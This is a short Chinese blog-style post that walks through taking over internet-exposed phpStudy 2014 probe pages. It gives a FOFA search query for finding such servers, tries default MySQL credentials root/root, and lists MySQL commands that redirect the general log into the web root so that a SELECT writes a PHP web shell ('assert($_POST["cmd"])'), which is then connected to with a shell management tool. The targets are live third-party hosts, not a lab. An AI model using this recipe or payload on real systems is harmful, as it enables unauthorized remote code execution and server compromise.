今天研究点比较low的东西,比如php探针到上线,哈哈哈哈,水起来
这个也是看到别的大佬的文章,然后自己去做了一遍发现可行,过程比较简单,由于个人安全问题,下面放出的过程不会很完整。
第一还是要去搜索一个php探针,body="phpstudy探针" && title="phpStudy 探针 2014"(fofa真牛鼻)
然后随便找一个,拉到最下面,root/root尝试连接mysql
出现上面那个图片那就很完美了,然后我们这样:
访问到这个url然后,就可以开始操作了。
show variables like 'general_log'; -- 查看日志是否开启
set global general_log=on; -- 开启日志功能
show variables like 'general_log_file'; -- 看看日志文件保存位置
set global general_log_file='tmp/general.lg'; -- 设置日志文件保存位置
show variables like 'log_output'; -- 看看日志输出类型 table或file
set global log_output='table'; -- 设置输出类型为 table
set global log_output='file'; -- 设置输出类型为file
两条命令搞定一切:
第一条:set global general_log=on;
第二条:set global general_log_file='tmp/general.lg'; logfile的是网站绝对路径,比如d:/www/xxx.php
设置完之后,就可以写一个webshell了
select'<?php assert($_POST["cmd"]);?>';
当你select之后就会产生日志,存放到那个log文件中
使用shell管理工具就可以进行链接了。